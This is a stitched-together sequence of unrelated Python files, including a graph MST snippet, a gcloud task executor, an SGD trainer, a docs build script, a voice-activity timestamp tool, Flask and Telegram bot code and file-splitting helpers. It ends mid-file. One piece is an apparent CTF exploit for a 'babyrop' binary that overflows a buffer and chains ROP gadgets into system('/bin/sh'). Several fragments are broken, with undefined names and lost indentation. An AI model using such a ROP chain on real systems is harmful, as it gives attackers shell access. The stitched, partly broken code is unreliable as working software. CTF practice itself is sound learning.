# Each planet: x, y, z coordinates; append the original index for edges.
arr = [list(map(int, si().split())) for _ in range(n)]
graph = []
for i in range(n):
    arr[i].append(i)
# Sort by each axis separately: only adjacent pairs per axis can be MST
# edges, which keeps the candidate count at 3*(n-1) instead of O(n^2).
s1 = sorted(arr, key=lambda x: x[0])
s2 = sorted(arr, key=lambda x: x[1])
s3 = sorted(arr, key=lambda x: x[2])
for i in range(1, n):
    graph.append((s1[i - 1][3], s1[i][3], abs(s1[i - 1][0] - s1[i][0])))
    graph.append((s2[i - 1][3], s2[i][3], abs(s2[i - 1][1] - s2[i][1])))
    graph.append((s3[i - 1][3], s3[i][3], abs(s3[i - 1][2] - s3[i][2])))
print(kruskal(graph))
|
def walk(directions):
    """Stub: move in the given directions (not yet implemented)."""
    pass
def use(object):
    """Stub: use the given object (not yet implemented).

    NOTE(review): the parameter name shadows the `object` builtin.
    """
    pass
|
class GlobalSensitivity(object):
    """Simple holder for a global sensitivity value."""

    def __init__(self, value):
        super().__init__()
        # Plain attribute: the original property/setter pair added no
        # validation or computation, so direct attribute access gives
        # callers identical get/set behavior through `obj.value`.
        self.value = value
|
from output.models.saxon_data.cta.cta0024_xsd.cta0024 import (
Doc,
Event,
When,
)
__all__ = [
"Doc",
"Event",
"When",
]
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Function for executing the tasks contained in a Task Iterator.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.storage import optimize_parameters_util
from googlecloudsdk.command_lib.storage import plurality_checkable_iterator
from googlecloudsdk.command_lib.storage.tasks import task_graph_executor
from googlecloudsdk.command_lib.storage.tasks import task_status
from googlecloudsdk.core import properties
def _execute_tasks_sequential(task_iterator,
                              received_messages=None,
                              task_status_queue=None):
  """Executes task objects one at a time, recursing into dependent tasks.

  Args:
    task_iterator (Iterable[task.Task]): An iterator for task objects.
    received_messages (Iterable[task.Message]): Messages sent to each
      task in task_iterator.
    task_status_queue (multiprocessing.Queue|None): Used by task to report
      its progress to a central location.

  Returns:
    Iterable[task.Message] emitted by tasks in task_iterator.
  """
  collected_messages = []
  for current_task in task_iterator:
    if received_messages is not None:
      current_task.received_messages = received_messages
    task_output = current_task.execute(task_status_queue=task_status_queue)
    if task_output is None:
      continue
    if task_output.messages is not None:
      collected_messages.extend(task_output.messages)
    if task_output.additional_task_iterators is None:
      continue
    # Each dependent iterator receives the messages produced by the one
    # executed before it.
    child_messages = []
    for child_iterator in task_output.additional_task_iterators:
      child_messages = _execute_tasks_sequential(
          child_iterator,
          child_messages,
          task_status_queue=task_status_queue)
  return collected_messages
def should_use_parallelism():
  """Checks execution settings to determine if parallelism should be used.

  This function is called in some tasks to determine how they are being
  executed, and should include as many of the relevant conditions as possible.

  Returns:
    True if parallel execution should be used, False otherwise.
  """
  configured_counts = (
      properties.VALUES.storage.process_count.GetInt(),
      properties.VALUES.storage.thread_count.GetInt(),
  )
  return any(count > 1 for count in configured_counts)
def execute_tasks(task_iterator,
                  parallelizable=False,
                  task_status_queue=None,
                  progress_type=None):
  """Call appropriate executor.

  Args:
    task_iterator: An iterator for task objects.
    parallelizable (boolean): Should tasks be executed in parallel.
    task_status_queue (multiprocessing.Queue|None): Used by task to report its
      progress to a central location.
    progress_type (task_status.ProgressType|None): Determines what type of
      progress indicator to display.

  Returns:
    An integer indicating the exit_code. Zero indicates no fatal errors were
      raised.
  """
  plurality_checkable_task_iterator = (
      plurality_checkable_iterator.PluralityCheckableIterator(task_iterator))
  # Tune execution parameters based on whether this looks like a
  # multi-file workload.
  optimize_parameters_util.detect_and_set_best_config(
      is_estimated_multi_file_workload=(
          plurality_checkable_task_iterator.is_plural()))
  # Some tasks operate under the assumption that they will only be executed when
  # parallelizable is True, and use should_use_parallelism to determine how they
  # are executed.
  if parallelizable and should_use_parallelism():
    exit_code = task_graph_executor.TaskGraphExecutor(
        plurality_checkable_task_iterator,
        max_process_count=properties.VALUES.storage.process_count.GetInt(),
        thread_count=properties.VALUES.storage.thread_count.GetInt(),
        task_status_queue=task_status_queue,
        progress_type=progress_type).run()
  else:
    with task_status.progress_manager(task_status_queue, progress_type):
      _execute_tasks_sequential(
          plurality_checkable_task_iterator,
          task_status_queue=task_status_queue)
    # TODO(b/188092601) Deterimine the exit_code in _execute_tasks_sequential.
    exit_code = 0
  return exit_code
|
import numpy as np
from . import itrainer
from .. import network
from typing import Callable, List, Tuple
class StochasticGradientDescent(itrainer.ITrainer):
    """Trainer that updates layer parameters with numerically estimated gradients."""

    @staticmethod
    def numerical_gradient(f: Callable, x: np.array, delta: float = 1e-4) -> np.array:
        """Central-difference gradient of f at x (x is restored after each probe)."""
        grad = np.zeros_like(x)
        it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
        while not it.finished:
            idx = it.multi_index
            original = float(x[idx])
            x[idx] = original + delta
            forward = f(x)
            x[idx] = original - delta
            backward = f(x)
            x[idx] = original
            grad[idx] = (forward - backward) / (2 * delta)
            it.iternext()
        return grad

    def __init__(self, learning_rate: float = 1e-1, batch_size: int = 100):
        self.learning_rate = learning_rate
        self.batch_size = batch_size

    def train(self, network: network.INetwork, train_image: np.array, train_label: np.array):
        """Run one epoch of mini-batch SGD over the training data."""
        total_iterations = max(1, int(train_image.shape[0] / self.batch_size))
        for iteration in range(total_iterations):
            print(
                f'iteration: {iteration} / {int(train_image.shape[0] / self.batch_size)}')
            mask = np.random.choice(train_image.shape[0], self.batch_size)
            batch_image = train_image[mask]
            batch_label = train_label[mask]
            grad_weights, grad_biases = self.get_gradients(
                network, batch_image, batch_label)
            for layer, grad_weight, grad_bias in zip(network.layers, grad_weights, grad_biases):
                layer.weight -= self.learning_rate * grad_weight
                layer.bias -= self.learning_rate * grad_bias
            print(network.get_loss(batch_image, batch_label))

    def get_gradients(self, network: network.INetwork, image: np.array, label: np.array) -> Tuple[List[np.array], List[np.array]]:
        """Numerical gradients of the loss w.r.t. each layer's weight and bias."""
        def get_loss(_):
            # The argument is ignored on purpose: numerical_gradient perturbs
            # the layer parameter arrays in place, and the network re-reads
            # those parameters on every loss evaluation.
            return network.get_loss(image, label)
        grad_weights = []
        grad_biases = []
        for layer in network.layers:
            grad_weights.append(
                StochasticGradientDescent.numerical_gradient(get_loss, layer.weight))
            grad_biases.append(
                StochasticGradientDescent.numerical_gradient(get_loss, layer.bias))
        return grad_weights, grad_biases
|
#!/usr/bin/env python
# ........................................................................... #
#
# This script generates the documentation using Python docutils.
#
# It requires the following softwares to be installed and made available from
# the invocation path context:
#
# - Python (of course!)
# - the docutils module (see http://docutils.sourceforge.net/)
# - a LaTeX distribution to invoke 'pdflatex' (MikTeX, TeXLive, teTeX, ...)
#
# It should be noted that the pdflatex invocation can be skipped if necessary
# by using a special command-line flag.
#
# ........................................................................... #
#
# IzPack - Copyright 2001-2008 Julien Ponge, All Rights Reserved.
#
# http://izpack.org/
# http://developer.berlios.de/projects/izpack/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ........................................................................... #
import os
import shutil
from glob import glob
from optparse import OptionParser
from docutils.core import publish_cmdline as publish
def create_dirs():
    """Ensure the html, pdf and xml output directories exist in the cwd."""
    print('Creating output directories...')
    for target in ('html', 'pdf', 'xml'):
        if not os.path.exists(target):
            os.makedirs(target)
def scan_files():
    """Return ([reST basenames, minus pdf-version], [image/css resources])."""
    print('Scanning files...')
    rest_files = [name[:-4] for name in glob('*.txt') if name != 'pdf-version.txt']
    resources = []
    for pattern in ('*.jpg', '*.png', '*.css'):
        resources.extend(glob(pattern))
    return rest_files, resources
def copy_files(resources):
    """Copy picture/stylesheet resources into html/ and pdf/, plus picins.sty."""
    print('Copying resources...')
    for resource in resources:
        print(' ' + resource)
        for target_dir in ('html/', 'pdf/'):
            shutil.copyfile(resource, target_dir + resource)
    # The LaTeX build needs the picins package next to manual.tex.
    shutil.copyfile('picins.sty', 'pdf/picins.sty')
def generate_html(rest_files):
    """Render each reST source to html/<name>.html with the site stylesheet."""
    print('Generating html...')
    # HTML pages get the real site header/footer includes.
    shutil.copyfile('include-top', 'include-top.inc')
    shutil.copyfile('include-bottom', 'include-bottom.inc')
    for rest_file in rest_files:
        print(' ' + rest_file)
        publish(writer_name='html', argv=[
            '--link-stylesheet',
            '--stylesheet-path=html/izpack.css',
            '--cloak-email-addresses',
            '%s.txt' % rest_file,
            'html/%s.html' % rest_file
        ])
def generate_xml():
    """Render each reST source to xml/<name>.xml.

    NOTE(review): unlike generate_html, this reads the module-global
    `rest_files` set up in the __main__ block; calling it before that
    global exists raises NameError -- consider passing rest_files in.
    """
    print('Generating XML...')
    # XML output wants no site header/footer, so swap in empty includes.
    shutil.copyfile('include-empty', 'include-top.inc')
    shutil.copyfile('include-empty', 'include-bottom.inc')
    for rest_file in rest_files:
        print(' ' + rest_file)
        args = [
            #'--indents',
            '--no-doctype',
            '%s.txt' % rest_file,
            'xml/%s.xml'% rest_file
        ]
        publish(writer_name='xml', argv=args)
def generate_latex():
    """Render the aggregate pdf-version.txt source to pdf/manual.tex."""
    print('Generating LaTeX for PDF output...')
    # LaTeX output wants no site header/footer, so swap in empty includes.
    for include_name in ('include-top.inc', 'include-bottom.inc'):
        shutil.copyfile('include-empty', include_name)
    publish(writer_name='newlatex2e', argv=['pdf-version.txt', 'pdf/manual.tex'])
def compile_latex():
    """Run pdflatex over pdf/manual.tex (three passes for stable references)."""
    print('Generating PDF from LaTeX...')
    os.chdir('pdf')
    # PORTABILITY FIX: range() behaves identically here on Python 2 and 3;
    # xrange is Python-2-only and crashed this function under Python 3.
    for i in range(1, 4):
        print(' pdflatex pass #%i' % i)
        os.system('pdflatex --interaction=batchmode manual.tex')
    os.chdir('..')
if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-n", "--no-pdflatex", dest="pdflatex", action="store_false",
                      default=True, help="don't call pdflatex")
    options, args = parser.parse_args()
    # rest_files is also consumed as a module global by generate_xml().
    rest_files, resources = scan_files()
    create_dirs()
    copy_files(resources)
    generate_xml()
    generate_html(rest_files)
    # Optionally skipped so docs can build without a LaTeX toolchain.
    if options.pdflatex:
        generate_latex()
        compile_latex()
    print('Done')
|
#!/usr/bin/env python
import rospy
from race.msg import drive_param
from std_msgs.msg import Float64
import numpy as np
def talker():
    """Publish a fixed float array to the 'floats' topic at 10 Hz."""
    topic = 'floats'
    # NOTE(review): numpy_msg and Floats are not imported anywhere in this
    # file (they normally come from rospy.numpy_msg / rospy_tutorials.msg),
    # so this line raises NameError as written -- confirm the intended
    # message type and add the imports.
    pub = rospy.Publisher(topic, numpy_msg(Floats))
    rospy.init_node('talker_node', anonymous=True)
    r = rospy.Rate(10)  # 10hz
    rospy.loginfo("I will publish to the topic %s", topic)
    while not rospy.is_shutdown():
        # BUG FIX: numpy is imported as `np` at the top of this file; the
        # bare `numpy` name was a NameError at runtime.
        a = np.array([1.0, 2.1, 3.2, 4.3, 5.4, 6.5], dtype=np.float32)
        pub.publish(a)
        r.sleep()
if __name__ == '__main__':
    talker()
|
import dataclasses
import json
import streamlit as st
from pydantic.json import pydantic_encoder
import streamlit_pydantic as sp
@dataclasses.dataclass
class ExampleModel:
    """Schema rendered by streamlit-pydantic as an input form."""
    some_number: int  # required numeric input
    some_boolean: bool  # required checkbox
    some_text: str = "default input"  # optional text input with a default
# Render the form; `data` holds the populated model once the user submits.
data = sp.pydantic_form(key="my_form", model=ExampleModel)
if data:
    st.json(json.dumps(data, default=pydantic_encoder))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma (@mythmgn),
"""
:description:
unittest for cup.services.executor
"""
import os
import sys
import time
_NOW_PATH = os.path.dirname(os.path.abspath(__file__)) + '/'
sys.path.insert(0, _NOW_PATH + '../')
import cup
from cup import unittest
from cup import log
from cup.services import executor
class TestMyCase(unittest.CUTCase):
    """
    test class for cup
    """
    def __init__(self):
        super(self.__class__, self).__init__(
            './test.log', log.DEBUG
        )
        log.info('Start to run ' + str(__file__))
        # Executor under test; started in setup(), stopped in teardown().
        self._executor = executor.ExecutionService(
        )
    def setup(self):
        """
        setup
        """
        self._executor.run()
        # Baseline timestamp; _change_data pushes it 100s into the future.
        self._info = time.time()
    def _change_data(self, data=None):
        self._info = time.time() + 100
    def test_run(self):
        """
        @author: maguannan
        """
        # Schedule _change_data to run 5 seconds from now.
        self._executor.delay_exec(5, self._change_data, 1)
        time.sleep(2)
        # Before the delayed call fires, _info still holds the past baseline.
        assert time.time() > self._info
        time.sleep(5)
        # After it fires, _info sits ~100s ahead of the current clock.
        assert time.time() < self._info
    def teardown(self):
        """
        teardown
        """
        cup.log.info('End running ' + str(__file__))
        self._executor.stop()
if __name__ == '__main__':
cup.unittest.CCaseExecutor().runcase(TestMyCase())
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
"""
USAGE:-
For FILE mode: python extract_timestamps.py -f <WAV_FILE_PATH> -a <AGGRESSIVENESS_LEVEL>
Ex: python extract_timestamps.py -f tts_modi_exp/resampled_16000/PM_Modi/PM_Modi_addresses_the_Nation_on_issues_relating_to_COVID19_PMO.wav
-a 1
--------------------------------------------------------------------------------------------------------------------------------------------
For FOLDER mode: python extract_timestamps.py -i <FOLDER_PATH> -a <AGGRESSIVENESS_LEVEL>
Ex: python extract_timestamps.py -i tts_modi_exp/resampled_16000/PM_Modi/ -a 1
"""
import collections
import contextlib
import wave
import webrtcvad
import os
import argparse
# import sys
def read_wave(path):
    """Read a mono 16-bit PCM .wav file.

    Returns (pcm_bytes, sample_rate); asserts the format is one the VAD
    accepts (single channel, 2-byte samples, 8/16/32/48 kHz).
    """
    with contextlib.closing(wave.open(path, 'rb')) as wav_file:
        assert wav_file.getnchannels() == 1
        assert wav_file.getsampwidth() == 2
        rate = wav_file.getframerate()
        assert rate in (8000, 16000, 32000, 48000)
        frames = wav_file.readframes(wav_file.getnframes())
    return frames, rate
class Frame(object):
    """A slice of PCM audio plus its position and length in seconds."""
    def __init__(self, bytes, timestamp, duration):
        # `bytes` shadows the builtin; name kept for caller compatibility.
        self.bytes, self.timestamp, self.duration = bytes, timestamp, duration
def frame_generator(frame_duration_ms, audio, sample_rate):
    """Yield Frame objects of `frame_duration_ms` ms from 16-bit PCM `audio`.

    Trailing audio shorter than one full frame is dropped.
    """
    step = int(sample_rate * (frame_duration_ms / 1000.0) * 2)  # bytes per frame (2 bytes/sample)
    frame_seconds = (float(step) / sample_rate) / 2.0
    pos, stamp = 0, 0.0
    while pos + step < len(audio):
        yield Frame(audio[pos:pos + step], stamp, frame_seconds)
        stamp += frame_seconds
        pos += step
def vad_collector(sample_rate, frame_duration_ms,
                  padding_duration_ms, vad, frames, start_time, end_time):
    """Filters out non-voiced audio frames.
    Given a webrtcvad.Vad and a source of audio frames, yields only
    the voiced audio.
    Uses a padded, sliding window algorithm over the audio frames.
    When more than 90% of the frames in the window are voiced (as
    reported by the VAD), the collector triggers and begins yielding
    audio frames. Then the collector waits until 90% of the frames in
    the window are unvoiced to detrigger.
    The window is padded at the front and back to provide a small
    amount of silence or the beginnings/endings of speech around the
    voiced frames.
    Arguments:
    sample_rate - The audio sample rate, in Hz.
    frame_duration_ms - The frame duration in milliseconds.
    padding_duration_ms - The amount to pad the window, in milliseconds.
    vad - An instance of webrtcvad.Vad.
    frames - a source of audio frames (sequence or generator).
    start_time / end_time - output lists: segment start/end times (in
        seconds) are appended as a SIDE EFFECT while this generator is
        consumed, so callers must drain the generator to get them all.
    Returns: A generator that yields PCM audio data.
    """
    num_padding_frames = int(padding_duration_ms / frame_duration_ms)
    # We use a deque for our sliding window/ring buffer.
    ring_buffer = collections.deque(maxlen=num_padding_frames)
    # We have two states: TRIGGERED and NOTTRIGGERED. We start in the
    # NOTTRIGGERED state.
    triggered = False
    voiced_frames = []
    for frame in frames:
        is_speech = vad.is_speech(frame.bytes, sample_rate)
        #sys.stdout.write('1' if is_speech else '0')
        if not triggered:
            ring_buffer.append((frame, is_speech))
            num_voiced = len([f for f, speech in ring_buffer if speech])
            # If we're NOTTRIGGERED and more than 90% of the frames in
            # the ring buffer are voiced frames, then enter the
            # TRIGGERED state.
            if num_voiced > 0.9 * ring_buffer.maxlen:
                triggered = True
                # Segment starts at the oldest buffered frame, so the
                # yielded audio includes the padding before speech.
                start_time.append(ring_buffer[0][0].timestamp)
                #sys.stdout.write('+(%s)' % (ring_buffer[0][0].timestamp,))
                # We want to yield all the audio we see from now until
                # we are NOTTRIGGERED, but we have to start with the
                # audio that's already in the ring buffer.
                for f, s in ring_buffer:
                    voiced_frames.append(f)
                ring_buffer.clear()
        else:
            # We're in the TRIGGERED state, so collect the audio data
            # and add it to the ring buffer.
            voiced_frames.append(frame)
            ring_buffer.append((frame, is_speech))
            num_unvoiced = len([f for f, speech in ring_buffer if not speech])
            # If more than 90% of the frames in the ring buffer are
            # unvoiced, then enter NOTTRIGGERED and yield whatever
            # audio we've collected.
            if num_unvoiced > 0.9 * ring_buffer.maxlen:
                #sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))
                end_time.append(frame.timestamp + frame.duration)
                triggered = False
                yield b''.join([f.bytes for f in voiced_frames])
                ring_buffer.clear()
                voiced_frames = []
    # Input exhausted while still in speech: close the open segment.
    if triggered:
        end_time.append(frame.timestamp + frame.duration)
        #sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))
    #sys.stdout.write('\n')
    # If we have any leftover voiced audio when we run out of input,
    # yield it.
    if voiced_frames:
        yield b''.join([f.bytes for f in voiced_frames])
def extract_time_stamps(wav_file, aggr_level):
    """Run WebRTC VAD over *wav_file* and return (start_time, end_time) lists.

    aggr_level is the VAD aggressiveness (0-3). The two returned lists are
    filled as a side effect of draining the vad_collector generator.
    """
    start_time = []
    end_time = []
    audio, sample_rate = read_wave(wav_file)
    vad = webrtcvad.Vad(int(aggr_level))
    frames = list(frame_generator(30, audio, sample_rate))
    segments = vad_collector(sample_rate, 30, 300, vad, frames, start_time, end_time)
    # Drain the generator; it appends to start_time/end_time while running.
    chunks = sum(1 for _ in segments)
    if chunks != len(start_time):
        # The original code had a bare `exit` here, which is a no-op
        # statement (the function never actually aborted). Keep the
        # warning but do not silently reference `exit`.
        print("Error: Segments not broken properly")
    return start_time, end_time
def extract_time_stamp_for_all_wav_files_in_a_folder(path, aggr_level):
    """Extract VAD timestamps for every file in *path* and write one CSV each.

    Delegates to extract_time_stamp_for_a_wav_file (the original duplicated
    its body verbatim); os.path.join fixes the case where *path* has no
    trailing slash (the original `path + name` produced a broken path then).
    """
    wav_files_list = os.listdir(path)
    print(len(wav_files_list))
    for name in wav_files_list:
        extract_time_stamp_for_a_wav_file(os.path.join(path, name), aggr_level)
def extract_time_stamp_for_a_wav_file(wav_file, aggr_level):
    """Extract VAD segment boundaries for one .wav and write them to a CSV.

    Output goes to tts_modi_exp/<wav basename>.csv with
    "Start_time,End_time" header rows (times in seconds).
    """
    start_time, end_time = extract_time_stamps(wav_file, aggr_level)
    # print("Start Timestamps: ", start_time, "\n\n End Timestamps: ", end_time)
    print('Wav File Name: ', wav_file)
    print("Aggresiveness Level: ", aggr_level)
    if len(start_time) == len (end_time):
        print("Chunk count will be: ",len(start_time))
    else:
        # Mismatched lists would make the zip below drop entries; warn only.
        print("len(start_time) != len (end_time)")
    wav_file_name = wav_file.split("/")[-1]
    timestamps_file = wav_file_name.replace('.wav', '.csv')
    file = 'tts_modi_exp/' + timestamps_file
    with open(file, 'w') as f:
        f.write("Start_time,End_time\n")
        for i in range(0, len(start_time)):
            f.write("{},{}\n".format(start_time[i], end_time[i]))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--input-folder', '-i', type=str)
    parser.add_argument('--input-file', '-f', type=str)
    parser.add_argument('--aggresiveness_level', '-a', type=int, default=3)
    args = parser.parse_args()
    # Dispatch on whichever mode was requested (see module docstring).
    # The original unconditionally ran FILE mode and crashed when only
    # -i was supplied (input_file was None).
    if args.input_file:
        extract_time_stamp_for_a_wav_file(args.input_file, args.aggresiveness_level)
    elif args.input_folder:
        extract_time_stamp_for_all_wav_files_in_a_folder(args.input_folder, args.aggresiveness_level)
    else:
        parser.error("provide --input-file/-f or --input-folder/-i")
    print("\nTimestamp Extraction Done!")
import os
from jumpscale import j
from .OauthInstance import OauthClient
JSConfigFactory = j.tools.configmanager.base_class_configs
class OauthFactory(JSConfigFactory):
    """Factory producing OauthClient instances for the jumpscale config manager."""
    def __init__(self):
        # Location under which the config manager exposes this factory.
        self.__jslocation__ = "j.clients.oauth"
        JSConfigFactory.__init__(self, OauthClient)
|
"""A helper module defining generated information about crate_universe dependencies"""
# This global should match the current release of `crate_unvierse`.
DEFAULT_URL_TEMPLATE = "https://github.com/bazelbuild/rules_rust/releases/download/crate_universe-13/crate_universe_resolver-{host_triple}{extension}"
# Note that if any additional platforms are added here, the pipeline defined
# by `create_universe.yaml` should also be updated
DEFAULT_SHA256_CHECKSUMS = {
"aarch64-apple-darwin": "c6017cd8a4fee0f1796a8db184e9d64445dd340b7f48a65130d7ee61b97051b4",
"aarch64-unknown-linux-gnu": "d0a310b03b8147e234e44f6a93e8478c260a7c330e5b35515336e7dd67150f35",
"x86_64-apple-darwin": "762f1c77b3cf1de8e84d7471442af1314157efd90720c7e1f2fff68556830ee2",
"x86_64-pc-windows-gnu": "c44bd97373d690587e74448b13267077d133f04e89bedfc9d521ae8ba55dddb9",
"x86_64-unknown-linux-gnu": "aebf51af6a3dd33fdac463b35b0c3f4c47ab93e052099199673289e2025e5824",
}
|
from ptrlib import *

# ROP exploit for the "babyrop" CTF binary: overflow a 0x18-byte buffer,
# then call system("/bin/sh") via a pop-rdi gadget.
sock = Process("./babyrop")
elf = ELF("./babyrop")
#sock = Socket("problem.harekaze.com", 20001)
rop_pop_rdi = 0x00400683  # gadget: pop rdi; ret
rop_ret = 0x00400479      # plain ret, used for stack alignment
payload = b'A' * 0x18                 # filler up to the saved return address
payload += p64(rop_ret)               # align stack before the call
payload += p64(rop_pop_rdi)
# rdi = address of "/bin/sh" in the binary; offset math is
# binary-specific — presumably accounts for the load base. TODO confirm.
payload += p64(elf.base() + 0x200000 + next(elf.find("/bin/sh\x00")))
payload += p64(elf.plt("system"))
payload += p64(0xffffffffffffffff)    # dummy return address
sock.sendline(payload)
sock.interactive()
|
class Solution:
    """LeetCode 55 "Jump Game": decide whether the last index is reachable."""

    def dfs(self, nums: list, cur_pos: int, pre_dict: dict) -> bool:
        """Depth-first search with memoisation.

        pre_dict maps position -> whether the end is reachable from there.
        Returns True iff the last index is reachable from cur_pos.
        """
        # Memo hit: the original only consulted pre_dict for failed child
        # positions, so already-solved positions were recomputed on every
        # visit (worst-case exponential work). Same results, far less work.
        if cur_pos in pre_dict:
            return pre_dict[cur_pos]
        n = len(nums)
        if cur_pos == n - 1:
            pre_dict[cur_pos] = True
            return True
        if nums[cur_pos] == 0:
            # Stuck: cannot move from a zero (unless it is the last index).
            pre_dict[cur_pos] = False
            return False
        if cur_pos + nums[cur_pos] >= n:
            # Max jump overshoots the array, so the last index is reachable.
            pre_dict[cur_pos] = True
            return True
        # Try the longest jump first; it tends to reach the end soonest.
        for k in range(nums[cur_pos], 0, -1):
            if cur_pos + k < n and self.dfs(nums, cur_pos + k, pre_dict):
                pre_dict[cur_pos] = True
                return True
        pre_dict[cur_pos] = False
        return False

    def canJump(self, nums: list) -> bool:
        """Return True iff index len(nums)-1 is reachable starting at index 0."""
        n = len(nums)
        if not n:
            return False
        if n == 1:
            return True
        return self.dfs(nums, 0, {})
# Manual smoke tests for Solution.canJump.
sl = Solution()
t1 = [2,3,1,1,4]
res = sl.canJump(t1)
print(res)  # expected: True
t2 = [3,2,1,0,4]
sl = Solution()
res = sl.canJump(t2)
print(res)  # expected: False
# Larger stress input.
t3 = [2,0,6,9,8,4,5,0,8,9,1,2,
    9,6,8,8,0,6,3,1,2,2,1,2,
    6,5,3,1,2,2,6,4,2,4,3,0,
    0,0,3,8,2,4,0,1,2,0,1,4,
    6,5,8,0,7,9,3,4,6,6,5,8,
    9,3,4,3,7,0,4,9,0,9,8,4,
    3,0,7,7,1,9,1,9,4,9,0,1,
    9,5,7,7,1,5,8,2,8,2,6,8,
    2,2,7,5,1,7,9,6]
res = sl.canJump(t3)
print(res)
import nltk
from flask import Flask, request
from flask_cors import cross_origin
from nltk.tokenize.treebank import TreebankWordTokenizer, TreebankWordDetokenizer
import spacy
from spacy.tokens import Doc
app = Flask(__name__)
# Loaded once at import time; en_core_web_lg is the large English model.
nlp = spacy.load('en_core_web_lg')
@app.route("/tokenize", methods=["POST"])
@cross_origin()
def tokenize():
text = request.json["text"]
doc = nlp(text)
tokens = []
for i in range(len(doc)):
token = doc[i]
print(token.idx, token.idx + len(token.text), doc[i].text)
tokens.append((token.idx, token.idx + len(token.text), doc[i].text))
return {"tokens": tokens}
@app.route("/detokenize", methods=["POST"])
@cross_origin()
def detokenize():
tokens = request.json["tokens"]
doc = Doc(nlp.vocab, tokens)
return {"text": doc.text}
if __name__ == "__main__":
app.run(port=5555, debug=True)
|
from lf3py.api.errors import UnsupportedMediaTypeError
from lf3py.api.request import Request
from lf3py.openapi.schema import embed
@embed.consume('application/json')
def json(request: Request):
    """Reject requests whose Content-Type media type is not application/json.

    Raises:
        UnsupportedMediaTypeError: when the media type differs.
    """
    # Compare only the media type: "application/json; charset=utf-8" must
    # also be accepted (the original compared the full header string, which
    # rejected any header carrying parameters).
    content_type = request.headers.get('Content-Type') or ''
    if content_type.split(';')[0].strip() != 'application/json':
        raise UnsupportedMediaTypeError()
|
from telegram import Update
from telegram.ext import CallbackContext
from gym_bot_app.decorators import get_trainee_and_group
from gym_bot_app.commands import (Command,
SelectDaysCommand)
from gym_bot_app.models import Trainee, Group
class MyDaysCommand(Command):
    """Telegram gym bot my days command.
    Sends the selected training days of the requested trainee.
    """
    DEFAULT_COMMAND_NAME = 'my_days'
    # User-facing reply (Hebrew) when no training days have been selected.
    NO_DAYS_SELECTED_MESSAGE = 'לא בחרת ימים להתאמן יא בוט. קח תתפנק'
    def __init__(self, *args, **kwargs):
        super(MyDaysCommand, self).__init__(*args, **kwargs)
    @get_trainee_and_group
    def _handler(self, update: Update, context: CallbackContext, trainee: Trainee, group: Group):
        """Override method to handle my days command.
        Checks the training days of the requested trainee and sends it back to the chat.
        If trainee did not select any training days, sends select days keyboard based on SelectDaysCommand keyboard.
        """
        self.logger.info('My days command with %s in %s', trainee, group)
        training_days = ', '.join(day.name for day in trainee.training_days.filter(selected=True))
        if training_days:  # trainee has selected training days.
            self.logger.debug('Trainee days %s', training_days)
            update.message.reply_text(quote=True, text=training_days)
        else:  # trainee did not select any training days.
            self.logger.debug('Trainee does not have any training days')
            select_days_keyboard = SelectDaysCommand.get_select_days_keyboard(trainee=trainee)
            update.message.reply_text(quote=True,
                                      text=self.NO_DAYS_SELECTED_MESSAGE,
                                      reply_markup=select_days_keyboard)
|
from pathlib import Path
def get_file_size(path_to_file):
    """Return the size of *path_to_file* in bytes."""
    stat_result = Path(path_to_file).stat()
    return stat_result.st_size
def get_allowed_sizes():
    """Return allowed part sizes: power-of-two MB labels mapped to byte counts.

    Twelve doublings starting at "1" -> 1048576 (1 MiB), ending at
    "2048" -> 2048 MiB.
    """
    sizes = {}
    label = 1
    num_bytes = 1048576
    for _ in range(12):
        sizes[str(label)] = num_bytes
        label *= 2
        num_bytes *= 2
    return sizes
def get_needed_parts(path_to_file, part_size_bytes, total_size):
    """Describe how to split *total_size* bytes into upload parts.

    Produces full parts of part_size_bytes plus one smaller trailing part
    when the size does not divide evenly. *path_to_file* is accepted for
    interface compatibility but not used here.
    """
    remainder = total_size % part_size_bytes
    full_count = int((total_size - remainder) / part_size_bytes)
    parts = [{"part_size": part_size_bytes} for _ in range(full_count)]
    if remainder > 0:
        parts.append({"part_size": remainder})
    return parts
def add_byte_ranges(parts):
    """Annotate each part dict (in place) with its byte range.

    Adds "range" (Content-Range style string), "range_start" and
    "range_end" (inclusive). Returns the same list for convenience.
    """
    offset = 0
    for part in parts:
        upper = offset + part.get("part_size")  # exclusive end of this part
        part["range"] = f"bytes {offset}-{upper - 1}/*"
        part["range_start"] = offset
        part["range_end"] = upper - 1
        offset = upper
    return parts
|
#!/usr/bin/env python
import logging
import coloredlogs
import os
import sys
class Log(object):
    """Configure a logger, optionally colored.

    LOG_LEVEL overrides the `level` argument; LOG_WITH_COLOR=false
    switches from coloredlogs to plain logging.basicConfig.
    """
    def __init__(self, logger=None, level='DEBUG'):
        env_level = os.getenv("LOG_LEVEL")
        if env_level:
            level = env_level
        level, logging_level = parse(level)
        self.logger = logging.getLogger(logger)
        log_format = "%(asctime)s %(levelname)s %(filename)s[line:%(lineno)d] - %(message)s"
        if os.getenv("LOG_WITH_COLOR") == "false":
            logging.basicConfig(level=logging_level, format=log_format)
        else:
            coloredlogs.install(
                level=level,
                logger=self.logger,
                datefmt='%Y-%m-%d/%H:%M:%S',
